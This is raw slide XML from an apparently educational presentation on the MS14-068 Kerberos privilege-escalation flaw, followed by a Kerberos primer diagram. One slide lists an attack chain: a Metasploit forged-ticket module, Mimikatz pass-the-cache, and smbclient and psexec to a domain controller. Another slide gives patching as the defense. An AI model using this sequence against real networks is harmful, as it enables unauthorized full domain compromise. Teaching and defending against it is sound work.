          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 5: MS14-068 Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63F55C7-7FA7-4588-A613-B501DAFA7EF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39903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FCBC-6237-4102-AA5E-BC7F41BAA5D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS14-068</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{652D642E-F967-42BB-BA6F-D399FBB29FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLDR from CERT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>The Microsoft Windows Kerberos KDC fails to properly check for valid signatures in the Privilege Attribute Certificate (PAC) included with the Kerberos ticket request. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>A domain user may forge the information contained in the PAC to request higher user privileges than should be allowed. Since the KDC does not verify the signature correctly, it will award the user the requested privileges, effectively making the user a domain administrator and allowing complete compromise of the entire domain.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit: Admin/Kerberos/ms14_068_Kerberos_checksum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="783659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F822-B125-4C92-B47F-B00E386BEE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS14-068</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24DB5D5-4A6C-4A52-9B96-A985A1834CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup Kerberos tools on Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-user / krb5-workstation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>configure a Realm in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/krb5.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>create ticket (kinit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>username@DOMAIN_NAME.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copy the file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/krb5cc_0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>open a session (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –W DOMAIN_NAME.COM –k //DC1.DOMAIN_NAME.COM/C$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mimikatz.exe “Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>file_from_msf.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\dc1.domain_name.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –s cmd.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4246353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F1AC-65F6-4D4B-9B19-7F0270880881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS14-068: Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA375FF1-E1C5-47AB-9E33-5459BDC8FBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PATCH!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94435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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Kerberos Primer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5632175" y="2877671"/>
            <a:ext cx="758011" cy="873120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16828475-5F95-4455-9D86-7408AEBBEA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384960" y="743777"/>
            <a:ext cx="1943731" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key Distribution Center (KDC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aka Domain Controller (DC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC46F57-5495-4CB3-B906-84B195B14C03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509897" y="4113704"/>
            <a:ext cx="1331282" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Principle: Service on Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6F0189-BFA0-4A1B-A7D5-83422A0CAAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3583898" y="2477831"/>
            <a:ext cx="1573800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Principle: User on Workstation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CACA3E8-B111-4A1B-9C6A-3D9EE1DD319D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
